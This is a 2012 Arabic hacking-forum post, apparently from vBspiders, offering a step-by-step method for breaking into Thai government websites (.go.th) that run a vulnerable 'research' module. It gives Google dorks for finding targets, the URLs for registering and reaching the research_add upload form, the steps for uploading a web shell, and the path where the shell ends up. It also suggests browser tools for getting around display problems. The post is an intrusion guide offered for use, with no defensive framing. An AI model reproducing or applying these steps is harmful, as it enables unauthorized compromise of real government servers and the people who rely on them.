يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
أدوات الموضوع انواع عرض الموضوع
قديم 07-06-2012, 02:55 PM   رقم المشاركة : 1
معلومات العضو
barbaros
 
إحصائية العضو





barbaros غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
barbaros is on a distinguished road

افتراضي ثغرة خطيرة لاختراق المواقع الحكومية (research)


السلام عليكم


Dork 1 :
كود:
site:go.th inurl:name=member+file=index
Dork 2:
كود:
site:go.th inurl:name=research
الصفحة الرئيسية:

كود:
http://www.xxx.go.th/?name=research http://www.xxx.go.th/index.php?name=research http://www.xxx.go.th/popup.php?name=research


لرفع الشيل اذهب إلى هذا الرابط:

كود:
http://www.xxx.go.th/?name=research&file=add&op=research_add http://www.xxx.go.th/index.php?name=research&file=add&op=research_add http://www.xxx.go.th/popup.php?name=research&file=add&op=research_add


إذا ظهرت رسالة الخطأ هذه:
[

التي تهني : "أنت لست عضوا"

يتوجب عليك التسجيل من هذا الرابط:

كود:
  
http://www.xxx.go.th/?name=member&file=index http://www.xxx.go.th/index.php?name=member&file=index http://www.xxx.go.th/popup.php?name=member&file=index


لرفع الشيل عليك بملأ الحقول كما في الصورة:


---------------------------------------------------

بعد ذلك ارجع إلى صفحة البداية لترى ملفك:

كود:
http://www.xxx.go.th/?name=research http://www.xxx.go.th/index.php?name=research http://www.xxx.go.th/popup.php?name=research


ثم اضغط على "FullText" كما في الصورة:



-----------------------------------------------------------------------------

انتظر عشر ثواني:


----------------------------------------------

ثم اضغط على download :





سيتم توجيهك الى رابط الشيل الذي يكون كهذا:

كود:
http://www.xxx.go.th/dontry/data/research_1340954535_z.php

ملاحظة مهمة: في كثير من الأحيان لا تعرض الصفحة بطريقة صحيحة فلا يظهر لك هيكل fckeditor لذا يتوجب عليك استخدام متصفح Opera لتجنب ذلك او استخدام الاضافات ك tamper data او auto fill



بالتوفيق للجميع.

التعديل الأخير تم بواسطة barbaros ; 07-06-2012 الساعة 02:57 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 03:07 AM


[ vBspiders.Com Network ]